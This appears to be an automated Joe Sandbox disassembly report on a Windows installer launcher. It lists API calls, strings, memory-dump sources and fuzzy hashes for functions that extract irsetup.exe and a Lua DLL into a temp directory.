lstrcpyA.KERNEL32 ref: 00007FF676FA1B99
lstrcatA.KERNEL32 ref: 00007FF676FA1BAD
lstrcpyA.KERNEL32 ref: 00007FF676FA1BBF
lstrcatA.KERNEL32 ref: 00007FF676FA1BD3
GetDiskFreeSpaceA.KERNELBASE ref: 00007FF676FA1C16

Part of subcall function 00007FF676FA180C: lstrlenA.KERNEL32 ref: 00007FF676FA1840
Part of subcall function 00007FF676FA180C: lstrcatA.KERNEL32 ref: 00007FF676FA185A
Part of subcall function 00007FF676FA180C: lstrlenA.KERNEL32 ref: 00007FF676FA1863
Part of subcall function 00007FF676FA180C: SetCurrentDirectoryA.KERNEL32 ref: 00007FF676FA18B6
Part of subcall function 00007FF676FA180C: CreateDirectoryA.KERNEL32 ref: 00007FF676FA18C7

lstrcpyA.KERNEL32 ref: 00007FF676FA1C45
SetCurrentDirectoryA.KERNELBASE ref: 00007FF676FA1C57

Strings

c:\temp, xrefs: 00007FF676FA1B10
_ir_sf_temp, xrefs: 00007FF676FA1A8B
%s%s_%d, xrefs: 00007FF676FA1A97
You must have at least 2MB of free space on your TEMP drive!, xrefs: 00007FF676FA1C3E
%s\irsetup.exe, xrefs: 00007FF676FA1AAC
irsetup.exe, xrefs: 00007FF676FA1B9F
lua5.1.dll, xrefs: 00007FF676FA1BC5
Could not determine a temp directory name. Try running setup.exe /T:<Path>, xrefs: 00007FF676FA1B42

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: Directory$lstrcpy$Currentlstrcatlstrlen$Create$Filewsprintf$AttributesDeleteDiskFreePathRemoveSpaceTemp
String ID: %s%s_%d$%s\irsetup.exe$Could not determine a temp directory name. Try running setup.exe /T:<Path>$You must have at least 2MB of free space on your TEMP drive!$_ir_sf_temp$c:\temp$irsetup.exe$lua5.1.dll
API String ID: 3816071345-4167539251
Opcode ID: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
Instruction ID: 4dbacbbbaf99c9a629c68a0850ea41ad46cef4007cb3ff7f16bbcf825c8c6fad
Opcode Fuzzy Hash: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
Instruction Fuzzy Hash: 74812D33A28ACB96EF04DF20E8941A9A362FB86755F809031D65E83564EFBDE55DC700

Function 00007FF676FA4260 Relevance: 4.5, APIs: 3, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 00007FF676FA4276
GetVersion.KERNEL32 ref: 00007FF676FA4288
HeapSetInformation.KERNEL32 ref: 00007FF676FA42A6

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
Instruction ID: d1a926cc0632d6c4372ee984dcfd12d13dfbf23d79d2920eec92b93a8cfbaae3
Opcode Fuzzy Hash: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
Instruction Fuzzy Hash: 7AE06D36E3AACA82FF846B51A8157752293FF8A340F800035E94E83B54DF7E90468A10

Function 00007FF676FA12AC Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lopen.KERNEL32 ref: 00007FF676FA12D4
lstrcpyA.KERNEL32(?,00000000,?,00007FF676FA2066), ref: 00007FF676FA12F2
malloc.LIBCMT ref: 00007FF676FA1305
lstrcpyA.KERNEL32(?,00000000,?,00007FF676FA2066), ref: 00007FF676FA131D
free.LIBCMT ref: 00007FF676FA155E

Strings

Unable to allocate memory buffer, xrefs: 00007FF676FA1316
Could not find setup size, xrefs: 00007FF676FA1528
Unable to open archive file, xrefs: 00007FF676FA12EB
Could not find data segment, xrefs: 00007FF676FA1545
Could not find total size indicator, xrefs: 00007FF676FA14E4
Could not find compression type indicator, xrefs: 00007FF676FA1494
Could not find multi-segment indicator, xrefs: 00007FF676FA1436

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: lstrcpy$_lopenfreemalloc
String ID: Could not find compression type indicator$Could not find data segment$Could not find multi-segment indicator$Could not find setup size$Could not find total size indicator$Unable to allocate memory buffer$Unable to open archive file
API String ID: 2570182538-3063878580
Opcode ID: 71fa4e2ca7f620c6ea6d80cc485d918b77db1b8f6fb191e66f381cae555fb6c9
Instruction ID: 762531fb281fd97cc12c2d3acc97bac95e46ff0d19a121a9618a69ac8bfdab2d
Opcode Fuzzy Hash: 71fa4e2ca7f620c6ea6d80cc485d918b77db1b8f6fb191e66f381cae555fb6c9
Instruction Fuzzy Hash: AD810823E28BC696EF19CB2898805B96762FB437A4F148235D77B875D0CF7EA552C300

Function 00007FF676FA1694 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 88
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE ref: 00007FF676FA16C0
_lread.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA16D5
lstrcpyA.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA16EB
malloc.LIBCMT ref: 00007FF676FA1705
SetFilePointer.KERNELBASE ref: 00007FF676FA1725
_lread.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA1739
_lcreat.KERNEL32 ref: 00007FF676FA1755
lstrcpyA.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA176D
_lwrite.KERNEL32 ref: 00007FF676FA1782
lstrcpyA.KERNEL32 ref: 00007FF676FA179C
_lclose.KERNEL32 ref: 00007FF676FA17A9
lstrcpyA.KERNEL32 ref: 00007FF676FA17C8
free.LIBCMT ref: 00007FF676FA17D6
lstrcpyA.KERNEL32 ref: 00007FF676FA17E8

Strings

Failed to alloc memory., xrefs: 00007FF676FA17E1
Failed to read Lua DLL, xrefs: 00007FF676FA17C1
Unable to open Lua DLL file, xrefs: 00007FF676FA1766
Could not find Lua DLL file size, xrefs: 00007FF676FA16E4
Unable to write to Lua file., xrefs: 00007FF676FA1795

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: lstrcpy$FilePointer_lread$_lclose_lcreat_lwritefreemalloc
String ID: Could not find Lua DLL file size$Failed to alloc memory.$Failed to read Lua DLL$Unable to open Lua DLL file$Unable to write to Lua file.
API String ID: 1949781031-3124031069
Opcode ID: f868dff44cf9b7f97a6f62bcab0372402652f1d3a34602d2d84b1a8c6ccb3683
Instruction ID: 817ba0446bf9f9bed5462b2c560197be9df7da4f8477c98e7df20982538f44e4
Opcode Fuzzy Hash: f868dff44cf9b7f97a6f62bcab0372402652f1d3a34602d2d84b1a8c6ccb3683
Instruction Fuzzy Hash: C6418233B28A8AD3DF14CB15E8800796762FB8A794F405034DA2F87660DF7DE555C700

Function 00007FF676FA1000 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 119
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadCursorA.USER32 ref: 00007FF676FA1046
SetCursor.USER32 ref: 00007FF676FA104F
lstrlenA.KERNEL32 ref: 00007FF676FA1078
lstrcpyA.KERNEL32 ref: 00007FF676FA108C
lstrcpyA.KERNEL32 ref: 00007FF676FA10D3
lstrlenA.KERNEL32 ref: 00007FF676FA10FF
lstrlenA.KERNEL32 ref: 00007FF676FA111A
CompareStringA.KERNELBASE ref: 00007FF676FA1172
MessageBoxA.USER32 ref: 00007FF676FA11CF

Strings

Launcher Error, xrefs: 00007FF676FA11BB
/~DBG, xrefs: 00007FF676FA1153

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: lstrlen$Cursorlstrcpy$CompareLoadMessageString
String ID: /~DBG$Launcher Error
API String ID: 4294429971-151238577
Opcode ID: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
Instruction ID: 6e0e95f46ecc3c00bd09a9c2f6667fc8c0029fbccc8a3b0610a441ca66572292
Opcode Fuzzy Hash: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
Instruction Fuzzy Hash: 70518B33A28ACA89EF20CF20D8451F923A6FB96794F804135D51E876A8DF3EE645C700

Function 00007FF676FA1578 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 00007FF676FA1598

Part of subcall function 00007FF676FA2AC0: _FF_MSGBANNER.LIBCMT ref: 00007FF676FA2AF0
Part of subcall function 00007FF676FA2AC0: HeapAlloc.KERNEL32 ref: 00007FF676FA2B15
Part of subcall function 00007FF676FA2AC0: _callnewh.LIBCMT ref: 00007FF676FA2B2E
Part of subcall function 00007FF676FA2AC0: _errno.LIBCMT ref: 00007FF676FA2B39
Part of subcall function 00007FF676FA2AC0: _errno.LIBCMT ref: 00007FF676FA2B44

SetFilePointer.KERNELBASE ref: 00007FF676FA15BB
_lread.KERNEL32(?,?,00000000,00007FF676FA2082), ref: 00007FF676FA15D1
_lcreat.KERNEL32 ref: 00007FF676FA15EB
lstrcpyA.KERNEL32(?,?,00000000,00007FF676FA2082), ref: 00007FF676FA1603
_lwrite.KERNEL32(?,?,00000000,00007FF676FA2082), ref: 00007FF676FA163B
lstrcpyA.KERNEL32(?,?,00000000,00007FF676FA2082), ref: 00007FF676FA165C
free.LIBCMT ref: 00007FF676FA166A
_lclose.KERNEL32 ref: 00007FF676FA1676

Strings

Failed to read setup engine, xrefs: 00007FF676FA1655
Unable to open setup file, xrefs: 00007FF676FA15FC

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: _errnolstrcpy$AllocFileHeapPointer_callnewh_lclose_lcreat_lread_lwritefreemalloc
String ID: Failed to read setup engine$Unable to open setup file
API String ID: 3486659530-2055280143
Opcode ID: 9d40c84a71f99a003ae53d5d6ece9c9615653bd0ab04dca7adcc173cb5d86a8c
Instruction ID: 1be8f241aaa9d2ac687c31486115aa3a6c95a77aa5f7ba227f3926eaa3f11d2f
Opcode Fuzzy Hash: 9d40c84a71f99a003ae53d5d6ece9c9615653bd0ab04dca7adcc173cb5d86a8c
Instruction Fuzzy Hash: D0318132B29A86C6DF148F25E8400B96322EB8AB98F184130DE2FCB394DE7DE4458700

Function 00007FF676FA2B80 Relevance: 18.1, APIs: 12, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF676FA2B92
_FF_MSGBANNER.LIBCMT ref: 00007FF676FA2BFD
_FF_MSGBANNER.LIBCMT ref: 00007FF676FA2C28
_RTC_Initialize.LIBCMT ref: 00007FF676FA2C41
_amsg_exit.LIBCMT ref: 00007FF676FA2C55
GetCommandLineA.KERNEL32 ref: 00007FF676FA2C5A
__setargv.LIBCMT ref: 00007FF676FA2C73
_amsg_exit.LIBCMT ref: 00007FF676FA2C81
_amsg_exit.LIBCMT ref: 00007FF676FA2C94
_cinit.LIBCMT ref: 00007FF676FA2C9E
_amsg_exit.LIBCMT ref: 00007FF676FA2CA9
_wincmdln.LIBCMT ref: 00007FF676FA2CAE

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: _amsg_exit$CommandInfoInitializeLineStartup__setargv_cinit_wincmdln
String ID:
API String ID: 4082634633-0
Opcode ID: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
Instruction ID: 784d4ff62e13e1afd8e85d6d53662de86f7545dd98fd54a5a06b6820e9ae2ef5
Opcode Fuzzy Hash: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
Instruction Fuzzy Hash: 28411A23F3C2CB86FE546B65A9123B96197AF83344F084035DA0DD72D7EE2FA4448611

Function 00007FF676FA204C Relevance: 10.6, APIs: 7, Instructions: 57
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF676FA12AC: _lopen.KERNEL32 ref: 00007FF676FA12D4
Part of subcall function 00007FF676FA12AC: lstrcpyA.KERNEL32(?,00000000,?,00007FF676FA2066), ref: 00007FF676FA12F2
Part of subcall function 00007FF676FA12AC: free.LIBCMT ref: 00007FF676FA155E

Sleep.KERNEL32 ref: 00007FF676FA20AE
DeleteFileA.KERNEL32 ref: 00007FF676FA20C4
DeleteFileA.KERNEL32 ref: 00007FF676FA20D1
RemoveDirectoryA.KERNEL32 ref: 00007FF676FA20DE

Part of subcall function 00007FF676FA19B4: GetCurrentDirectoryA.KERNEL32 ref: 00007FF676FA19F5
Part of subcall function 00007FF676FA19B4: GetTempPathA.KERNEL32 ref: 00007FF676FA1A11
Part of subcall function 00007FF676FA19B4: lstrlenA.KERNEL32 ref: 00007FF676FA1A1E
Part of subcall function 00007FF676FA19B4: lstrcpyA.KERNEL32 ref: 00007FF676FA1A48
Part of subcall function 00007FF676FA19B4: lstrlenA.KERNEL32 ref: 00007FF676FA1A58
Part of subcall function 00007FF676FA19B4: lstrcatA.KERNEL32 ref: 00007FF676FA1A74
Part of subcall function 00007FF676FA19B4: wsprintfA.USER32 ref: 00007FF676FA1AA2
Part of subcall function 00007FF676FA19B4: wsprintfA.USER32 ref: 00007FF676FA1ABA
Part of subcall function 00007FF676FA19B4: DeleteFileA.KERNELBASE ref: 00007FF676FA1AC7
Part of subcall function 00007FF676FA19B4: RemoveDirectoryA.KERNELBASE ref: 00007FF676FA1AD1
Part of subcall function 00007FF676FA19B4: GetFileAttributesA.KERNELBASE ref: 00007FF676FA1ADB
Part of subcall function 00007FF676FA19B4: CreateDirectoryA.KERNELBASE ref: 00007FF676FA1AEC
Part of subcall function 00007FF676FA19B4: lstrcpyA.KERNEL32 ref: 00007FF676FA1AFB
Part of subcall function 00007FF676FA19B4: SetCurrentDirectoryA.KERNELBASE ref: 00007FF676FA1B06
Part of subcall function 00007FF676FA19B4: lstrcpyA.KERNEL32 ref: 00007FF676FA1B1C
Part of subcall function 00007FF676FA19B4: CreateDirectoryA.KERNEL32 ref: 00007FF676FA1B29
Part of subcall function 00007FF676FA19B4: SetCurrentDirectoryA.KERNEL32 ref: 00007FF676FA1B34
Part of subcall function 00007FF676FA19B4: lstrcpyA.KERNEL32 ref: 00007FF676FA1B49
Part of subcall function 00007FF676FA19B4: lstrlenA.KERNEL32 ref: 00007FF676FA1B59
Part of subcall function 00007FF676FA19B4: lstrcatA.KERNEL32 ref: 00007FF676FA1B75
Part of subcall function 00007FF676FA19B4: lstrcpyA.KERNEL32 ref: 00007FF676FA1B87

MoveFileExA.KERNEL32 ref: 00007FF676FA20EC
MoveFileExA.KERNEL32 ref: 00007FF676FA20FF
MoveFileExA.KERNEL32 ref: 00007FF676FA2112

Part of subcall function 00007FF676FA1578: malloc.LIBCMT ref: 00007FF676FA1598
Part of subcall function 00007FF676FA1578: SetFilePointer.KERNELBASE ref: 00007FF676FA15BB
Part of subcall function 00007FF676FA1578: _lread.KERNEL32(?,?,00000000,00007FF676FA2082), ref: 00007FF676FA15D1
Part of subcall function 00007FF676FA1578: _lcreat.KERNEL32 ref: 00007FF676FA15EB
Part of subcall function 00007FF676FA1578: lstrcpyA.KERNEL32(?,?,00000000,00007FF676FA2082), ref: 00007FF676FA1603
Part of subcall function 00007FF676FA1578: free.LIBCMT ref: 00007FF676FA166A
Part of subcall function 00007FF676FA1578: _lclose.KERNEL32 ref: 00007FF676FA1676

Part of subcall function 00007FF676FA1694: SetFilePointer.KERNELBASE ref: 00007FF676FA16C0
Part of subcall function 00007FF676FA1694: _lread.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA16D5
Part of subcall function 00007FF676FA1694: lstrcpyA.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA16EB
Part of subcall function 00007FF676FA1694: malloc.LIBCMT ref: 00007FF676FA1705
Part of subcall function 00007FF676FA1694: SetFilePointer.KERNELBASE ref: 00007FF676FA1725
Part of subcall function 00007FF676FA1694: _lread.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA1739
Part of subcall function 00007FF676FA1694: _lcreat.KERNEL32 ref: 00007FF676FA1755
Part of subcall function 00007FF676FA1694: lstrcpyA.KERNEL32(?,?,00000000,00007FF676FA2090), ref: 00007FF676FA176D
Part of subcall function 00007FF676FA1694: free.LIBCMT ref: 00007FF676FA17D6

Part of subcall function 00007FF676FA1C88: wsprintfA.USER32 ref: 00007FF676FA1D31
Part of subcall function 00007FF676FA1C88: lstrlenA.KERNEL32 ref: 00007FF676FA1D41
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1D58
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1D65
Part of subcall function 00007FF676FA1C88: wsprintfA.USER32 ref: 00007FF676FA1D7D
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1D89
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1D96
Part of subcall function 00007FF676FA1C88: wsprintfA.USER32 ref: 00007FF676FA1DAF
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1DBB
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1DC8
Part of subcall function 00007FF676FA1C88: wsprintfA.USER32 ref: 00007FF676FA1DE0
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1DEC
Part of subcall function 00007FF676FA1C88: lstrcatA.KERNEL32 ref: 00007FF676FA1DF9
Part of subcall function 00007FF676FA1C88: GetCurrentProcess.KERNEL32 ref: 00007FF676FA1E04
Part of subcall function 00007FF676FA1C88: OpenProcessToken.ADVAPI32 ref: 00007FF676FA1E17
Part of subcall function 00007FF676FA1C88: malloc.LIBCMT ref: 00007FF676FA1E35

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: Filelstrcat$lstrcpy$Directory$wsprintf$Currentlstrlen$DeleteMovePointer_lreadfreemalloc$CreateProcessRemove_lcreat$AttributesOpenPathSleepTempToken_lclose_lopen
String ID:
API String ID: 1722154105-0
Opcode ID: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
Instruction ID: 8a9bf2599d20564c901d3003332ba31bc9bc4abc4d59662a7fad46875c3d3eb2
Opcode Fuzzy Hash: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
Instruction Fuzzy Hash: 94212F37A285CF82EF15AB31A8102B923A3AF96B44F8D9030D50EC7195DE3EE859C700

Non-executed Functions

Function 00007FF676FA5D98 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5DDD
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5DF9
EncodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E0B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E22
EncodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E2B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E42
EncodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E4B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E62
EncodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E6B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E8A
EncodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5E93
DecodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5EC6
DecodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5ED6
DecodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5F2C
DecodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5F4D
DecodePointer.KERNEL32(?,?,?,00000000,00007FF676FA3FD4,00007FF676FA2E80), ref: 00007FF676FA5F67

Strings

MessageBoxW, xrefs: 00007FF676FA5DEF
GetUserObjectInformationW, xrefs: 00007FF676FA5E51
GetLastActivePopup, xrefs: 00007FF676FA5E31
GetActiveWindow, xrefs: 00007FF676FA5E11
GetProcessWindowStation, xrefs: 00007FF676FA5E80
USER32.DLL, xrefs: 00007FF676FA5DD6

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
Instruction ID: 3e93947d7127be84bc289e32208eb1e8072d767855fafd3b308eb080f9a078d8
Opcode Fuzzy Hash: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
Instruction Fuzzy Hash: 6F511A23E3ABCF80FE559B51B85417923A6BF4BB84F440439DD1E877A4EF7EA4458200

Function 00007FF676FA3D40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_set_error_mode.LIBCMT ref: 00007FF676FA3D85
_set_error_mode.LIBCMT ref: 00007FF676FA3D96
GetModuleFileNameW.KERNEL32 ref: 00007FF676FA3DF8

Part of subcall function 00007FF676FA338C: GetCurrentProcess.KERNEL32(00007FF676FA342E), ref: 00007FF676FA33A4

GetStdHandle.KERNEL32 ref: 00007FF676FA3F0D
WriteFile.KERNEL32 ref: 00007FF676FA3F6A

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00007FF676FA3EB1
..., xrefs: 00007FF676FA3E4A
Runtime Error!Program: , xrefs: 00007FF676FA3DC5
<program name unknown>, xrefs: 00007FF676FA3E07

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

